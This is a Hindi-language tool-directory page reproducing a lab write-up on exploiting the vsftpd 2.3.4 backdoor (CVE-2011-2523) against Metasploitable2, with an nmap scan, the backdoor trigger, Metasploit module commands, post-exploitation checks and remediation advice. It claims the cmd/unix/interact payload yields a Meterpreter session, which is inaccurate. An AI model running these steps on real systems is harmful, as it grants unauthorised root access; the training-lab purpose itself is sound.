Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
metasploitable2-vsftpd-writeup — Metasploitable2 पर vsftpd 2.3.4 बैकडोर (CVE-2011-2523) का शोषण — रिकॉन, एक्सप्लॉयटेशन और रेमेडिएशन को कवर करने वाला एक व्यावहारिक पेंटेस्टिंग लैब राइटअप। | Kitploit
उपकरण/GitHubGitHub/rsakthikumar-cmd/metasploitable2-vsftpd-writeup
टोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
rsakthikumar-cmd/metasploitable2-vsftpd-writeup

metasploitable2-vsftpd-writeup

Metasploitable2 पर vsftpd 2.3.4 बैकडोर (CVE-2011-2523) का शोषण — रिकॉन, एक्सप्लॉयटेशन और रेमेडिएशन को कवर करने वाला एक व्यावहारिक पेंटेस्टिंग लैब राइटअप।

रिपॉजिटरी देखें
1 दिन पहलेअभी तक समीक्षित नहीं

Metasploitable2 — vsftpd 2.3.4 बैकडोर शोषण

एक व्यावहारिक प्रयोगशाला जो vsftpd 2.3.4 में ज्ञात बैकडोर भेद्यता की खोज और शोषण को प्रदर्शित करती है, एक पृथक Kali Linux ↔ Metasploitable2 वातावरण का उपयोग करते हुए।

उद्देश्य

जानबूझकर कमजोर लक्ष्य मशीन के विरुद्ध कोर पैठ परीक्षण कार्यप्रवाह — टोही, भेद्यता पहचान, शोषण, और पोस्ट-एक्सप्लॉइटेशन सत्यापन — का अभ्यास करें।

प्रयोगशाला वातावरण

घटकविवरण
आक्रमणकर्ताKali Linux 2026.1 (VMware)
लक्ष्यMetasploitable2 (VMware)
नेटवर्कNAT, होस्ट/इंटरनेट से पृथक
लक्ष्य IP192.168.233.129

दोनों VM को एक ही निजी नेटवर्क सेगमेंट पर रखा गया था, वास्तविक नेटवर्क से पृथक, ताकि यह सुनिश्चित किया जा सके कि अभ्यास का कोई बाहरी जोखिम न हो।

कार्यप्रणाली

1. टोही — Nmap स्कैन

root@kitploit:~
nmap -sV -sC 192.168.233.129

लक्ष्य को खुले पोर्ट और सेवा संस्करणों के लिए स्कैन किया। परिणामों में शामिल थे:

root@kitploit:~
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
...

Nmap स्कैन जो vsftpd 2.3.4 दिखा रहा है

2. भेद्यता पहचान

पोर्ट 21 पर vsftpd 2.3.4 चल रहा था। यह विशिष्ट संस्करण सार्वजनिक रूप से बैकडोर युक्त होने के लिए जाना जाता है: 2011 में, आधिकारिक vsftpd स्रोत संग्रह से छेड़छाड़ की गई और दुर्भावनापूर्ण कोड डाला गया। :) स्ट्रिंग वाले उपयोगकर्ता नाम से लॉग इन करने पर TCP पोर्ट 6200 पर एक छिपा हुआ लिसनर सक्रिय होता है, जो बिना प्रमाणीकरण के रिमोट शेल प्रदान करता है।

  • संदर्भ: CVE-2011-2523
  • प्रभाव: रूट के रूप में बिना प्रमाणीकरण के रिमोट कोड निष्पादन

3. शोषण — Metasploit

root@kitploit:~
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.233.129
set payload cmd/unix/interact
run

शोषण ने सफलतापूर्वक बैकडोर को सक्रिय किया और एक Meterpreter सत्र लौटाया।

Metasploit शोषण रन जो Meterpreter सत्र खुला दिखा रहा है

4. पोस्ट-एक्सप्लॉइटेशन सत्यापन

root@kitploit:~
sessions -i 1
sysinfo
getuid

समझौता किए गए होस्ट पर सक्रिय सत्र और पहुंच स्तर की पुष्टि की।

sysinfo आउटपुट

getuid आउटपुट जो रूट एक्सेस की पुष्टि करता है

परिणाम

केवल एक पुरानी और बैकडोर युक्त सेवा का शोषण करके, बिना किसी प्रमाणीकरण की आवश्यकता के, लक्ष्य मशीन पर पूर्ण रूट-स्तरीय रिमोट शेल एक्सेस प्राप्त किया।

मूल कारण

  • पुराना सॉफ़्टवेयर संस्करण (vsftpd 2.3.4) जो स्रोत पर समझौता किया गया था
  • ज्ञात-कमजोर सेवा संस्करण का पता लगाने या पैच करने के लिए कोई प्रक्रिया नहीं

सुधार के उपाय

  • vsftpd को वर्तमान, सत्यापित-स्वच्छ रिलीज़ में अपग्रेड करें
  • सॉफ़्टवेयर पैकेज हमेशा आधिकारिक/सत्यापित रिपॉजिटरी से चेकसम सत्यापन के साथ डाउनलोड करें
  • परिनियोजन से पहले पुराने सेवा संस्करणों को पकड़ने के लिए नियमित भेद्यता स्कैनिंग लागू करें
  • अनावश्यक रूप से उजागर सेवाओं (FTP) को जहाँ आवश्यक न हो, प्रतिबंधित करें, या अतिरिक्त एक्सेस नियंत्रण के पीछे रखें

मुख्य निष्कर्ष

एक ज्ञात, सार्वजनिक भेद्यता वाली एकमात्र पुरानी सेवा पूर्ण सिस्टम समझौते के लिए पर्याप्त थी — किसी कस्टम शोषण विकास या उन्नत तकनीक की आवश्यकता नहीं थी। यह उजागर करता है कि पैच प्रबंधन और संस्करण स्वच्छता वास्तविक दुनिया के सुरक्षा आसन की नींव क्यों हैं।

अस्वीकरण

यह अभ्यास विशेष रूप से Metasploitable2 के विरुद्ध किया गया था, जो सुरक्षा प्रशिक्षण के लिए डिज़ाइन की गई जानबूझकर कमजोर वर्चुअल मशीन है, एक पृथक लैब नेटवर्क के भीतर जिसका उत्पादन प्रणालियों या तृतीय-पक्ष बुनियादी ढांचे से कोई संबंध नहीं है।

टूल डाउनलोड करें